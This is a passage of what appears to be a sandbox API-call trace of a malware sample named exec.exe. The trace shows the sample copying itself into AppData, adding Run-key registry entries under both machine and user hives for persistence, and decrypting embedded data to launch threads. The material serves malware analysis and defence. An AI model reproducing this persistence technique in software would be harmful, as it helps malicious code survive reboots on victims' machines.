out: hHeap=0x20f0000) returned 1 [0124.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1580 | out: hHeap=0x20f0000) returned 1 [0124.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20f5688 [0124.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20f58a0 [0124.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20f5ab8 [0124.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20f5cd0 [0124.018] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f5688, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0124.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20f5ee8 [0124.018] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f5ee8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0124.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5ee8 | out: hHeap=0x20f0000) returned 1 [0124.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x20f5ee8 [0124.018] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f5ee8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0124.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5ee8 | out: hHeap=0x20f0000) returned 1 [0124.018] CopyFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe"), bFailIfExists=0) returned 1 [0124.025] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x33f85c | out: phkResult=0x33f85c*=0x98) returned 0x0 [0124.025] RegSetValueExW (in: hKey=0x98, lpValueName="exec", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", cbData=0x68 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe") returned 0x0 [0124.025] RegCloseKey (hKey=0x98) returned 0x0 [0124.025] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x33f848 | out: phkResult=0x33f848*=0x98) returned 0x0 [0124.025] RegSetValueExW (in: hKey=0x98, lpValueName="exec", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", cbData=0x68 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe") returned 0x0 [0124.025] RegCloseKey (hKey=0x98) returned 0x0 [0124.025] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x134) returned 0x20f1580 [0124.025] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.026] SetLastError (dwErrCode=0x0) [0124.026] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.027] GetLastError () returned 0x0 [0124.027] SetLastError (dwErrCode=0x0) [0124.028] GetLastError () returned 0x0 [0124.031] SetLastError (dwErrCode=0x0) [0124.031] GetLastError () returned 0x0 [0124.031] SetLastError (dwErrCode=0x0) [0124.031] GetLastError () returned 0x0 [0124.031] SetLastError (dwErrCode=0x0) [0124.031] GetLastError () returned 0x0 [0124.031] SetLastError (dwErrCode=0x0) [0124.031] GetLastError () returned 0x0 [0124.031] SetLastError (dwErrCode=0x0) [0124.031] GetLastError () returned 0x0 [0124.031] SetLastError (dwErrCode=0x0) [0124.031] GetLastError () returned 0x0 [0124.032] SetLastError (dwErrCode=0x0) [0124.032] GetLastError () returned 0x0 [0124.032] SetLastError (dwErrCode=0x0) [0124.032] GetLastError () returned 0x0 [0124.032] CopyFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), lpNewFileName="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 0 [0124.032] CopyFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 0 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1580 | out: hHeap=0x20f0000) returned 1 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5688 | out: hHeap=0x20f0000) returned 1 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f58a0 | out: hHeap=0x20f0000) returned 1 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5ab8 | out: hHeap=0x20f0000) returned 1 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5cd0 | out: hHeap=0x20f0000) returned 1 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1500 | out: hHeap=0x20f0000) returned 1 [0124.033] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0124.033] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xc0) returned 0x20f1470 [0124.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f854 | out: phKey=0x33f854*=0xa273c0) returned 1 [0124.033] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x33f83c, dwFlags=0x0) returned 1 [0124.033] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f808 | out: pbData=0x20f1470, pdwDataLen=0x33f808) returned 1 [0124.033] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.033] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xbd) returned 0x20f1538 [0124.033] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833033, lpParameter=0x20f1538, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x98 [0124.034] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0x0) returned 0x102 [0124.034] CloseHandle (hObject=0x98) returned 1 [0124.034] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0124.034] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x60) returned 0x20f1470 [0124.034] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f860 | out: phKey=0x33f860*=0xa273c0) returned 1 [0124.034] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x33f848, dwFlags=0x0) returned 1 [0124.034] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f814 | out: pbData=0x20f1470, pdwDataLen=0x33f814) returned 1 [0124.034] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.034] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x5c) returned 0x20f1600 [0124.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833033, lpParameter=0x20f1600, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x98 [0124.035] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0x1388) returned 0x102 [0132.602] CloseHandle (hObject=0x98) returned 1 [0132.602] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f1718 [0132.602] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f82c | out: phKey=0x33f82c*=0xa28fd8) returned 1 [0132.602] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f814, dwFlags=0x0) returned 1 [0132.602] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1718, pdwDataLen=0x33f7e0 | out: pbData=0x20f1718, pdwDataLen=0x33f7e0) returned 1 [0132.602] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f1740 [0132.602] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f1470 [0132.602] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f1498 [0132.602] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f79c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f804 | out: phKey=0x33f804*=0xa28fd8) returned 1 [0132.602] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f7ec, dwFlags=0x0) returned 1 [0132.602] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1498, pdwDataLen=0x33f7b8 | out: pbData=0x20f1498, pdwDataLen=0x33f7b8) returned 1 [0132.602] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.602] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1498 | out: hHeap=0x20f0000) returned 1 [0132.602] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0132.602] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1470 | out: hHeap=0x20f0000) returned 1 [0132.602] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1718 | out: hHeap=0x20f0000) returned 1 [0132.602] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x33f86c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x33f86c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.603] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1740 | out: hHeap=0x20f0000) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x20f1718 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f1748 [0132.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f73c | out: phKey=0x33f73c*=0xa28fd8) returned 1 [0132.603] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f724, dwFlags=0x0) returned 1 [0132.603] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1748, pdwDataLen=0x33f6f0 | out: pbData=0x20f1748, pdwDataLen=0x33f6f0) returned 1 [0132.603] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f1470 [0132.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6cc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f734 | out: phKey=0x33f734*=0xa28fd8) returned 1 [0132.603] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f71c, dwFlags=0x0) returned 1 [0132.603] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1470, pdwDataLen=0x33f6e8 | out: pbData=0x20f1470, pdwDataLen=0x33f6e8) returned 1 [0132.603] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f1488 [0132.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f72c | out: phKey=0x33f72c*=0xa28fd8) returned 1 [0132.603] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f714, dwFlags=0x0) returned 1 [0132.603] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f1488, pdwDataLen=0x33f6e0 | out: pbData=0x20f1488, pdwDataLen=0x33f6e0) returned 1 [0132.603] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f14a0 [0132.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6bc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f724 | out: phKey=0x33f724*=0xa28fd8) returned 1 [0132.603] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f70c, dwFlags=0x0) returned 1 [0132.603] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14a0, pdwDataLen=0x33f6d8 | out: pbData=0x20f14a0, pdwDataLen=0x33f6d8) returned 1 [0132.603] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0132.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f71c | out: phKey=0x33f71c*=0xa28fd8) returned 1 [0132.603] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f704, dwFlags=0x0) returned 1 [0132.603] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x33f6d0 | out: pbData=0x20f5498, pdwDataLen=0x33f6d0) returned 1 [0132.603] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f14b8 [0132.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f714 | out: phKey=0x33f714*=0xa28fd8) returned 1 [0132.603] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f6fc, dwFlags=0x0) returned 1 [0132.603] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14b8, pdwDataLen=0x33f6c8 | out: pbData=0x20f14b8, pdwDataLen=0x33f6c8) returned 1 [0132.603] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x70) returned 0x20f5530 [0132.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f6a4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f70c | out: phKey=0x33f70c*=0xa28fd8) returned 1 [0132.603] CryptSetKeyParam (hKey=0xa28fd8, dwParam=0x1, pbData=0x33f6f4, dwFlags=0x0) returned 1 [0132.603] CryptDecrypt (in: hKey=0xa28fd8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5530, pdwDataLen=0x33f6c0 | out: pbData=0x20f5530, pdwDataLen=0x33f6c0) returned 1 [0132.603] CryptDestroyKey (hKey=0xa28fd8) returned 1 [0132.603] htonl (hostlong=0x9c354b42) returned 0x424b359c [0132.604] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x20, pbBuffer=0x33f800 | out: pbBuffer=0x33f800) returned 1 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x28) returned 0x20f14d0 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f1500 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4) returned 0x20f1518 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x14) returned 0x20f55a8 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f55c8 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x80) returned 0x20f55e0 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f5668 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x82) returned 0x20f5680 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f5710 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4) returned 0x20f1528 [0132.604] CryptAcquireContextW (in: phProv=0x83fcf4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x83fcf4*=0xa29090) returned 1 [0132.604] CryptGenRandom (in: hProv=0xa29090, dwLen=0x55, pbBuffer=0x33f76a | out: pbBuffer=0x33f76a) returned 1 [0132.604] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f5728 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x80) returned 0x20f5740 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f57c8 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x2) returned 0x20f57e0 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4) returned 0x20f57f0 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f5800 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x80) returned 0x20f5818 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f58a0 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x4) returned 0x20f58b8 [0132.605] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f57e0, Size=0x82) returned 0x20f58c8 [0132.605] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f58b8, Size=0x100) returned 0x20f5958 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x20f5a60 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x82) returned 0x2226b90 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c20 [0132.605] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x82) returned 0x2226c38 [0132.605] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x2226b90, Size=0x104) returned 0x2226cc8 [0132.605] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f55e0, Size=0x100) returned 0x2226dd8 [0132.605] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f58c8, Size=0x104) returned 0x2226ee0 [0132.605] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f5958, Size=0x200) returned 0x2226ff0 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f57f0 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226ff0 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f58a0 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5740 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5728 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5818 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5800 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226ee0 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f57c8 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226cc8 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5a60 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c38 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c20 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1518 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1500 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5680 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5668 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226dd8 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f55c8 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1528 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5710 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d0 | out: hHeap=0x20f0000) returned 1 [0132.606] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f55a8 | out: hHeap=0x20f0000) returned 1 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xa4) returned 0x20f55a8 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x62) returned 0x20f5658 [0132.607] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f5658, Size=0xc2) returned 0x20f5658 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226ba8 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xb40) returned 0x2227390 [0132.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f704 | out: phKey=0x33f704*=0xa29008) returned 1 [0132.607] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6ec, dwFlags=0x0) returned 1 [0132.607] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227390, pdwDataLen=0x33f6b8 | out: pbData=0x2227390, pdwDataLen=0x33f6b8) returned 1 [0132.607] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226bc0 [0132.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f694, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6fc | out: phKey=0x33f6fc*=0xa29008) returned 1 [0132.607] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6e4, dwFlags=0x0) returned 1 [0132.607] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226bc0, pdwDataLen=0x33f6b0 | out: pbData=0x2226bc0, pdwDataLen=0x33f6b0) returned 1 [0132.607] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227ed8 [0132.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f66c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6d4 | out: phKey=0x33f6d4*=0xa29008) returned 1 [0132.607] CryptSetKeyParam (hKey=0xa29008, dwParam=0x1, pbData=0x33f6bc, dwFlags=0x0) returned 1 [0132.607] CryptDecrypt (in: hKey=0xa29008, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227ed8, pdwDataLen=0x33f688 | out: pbData=0x2227ed8, pdwDataLen=0x33f688) returned 1 [0132.607] CryptDestroyKey (hKey=0xa29008) returned 1 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x84) returned 0x20f5728 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x84) returned 0x20f97b0 [0132.607] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f57b8 [0132.607] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f644, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f6ac | out: 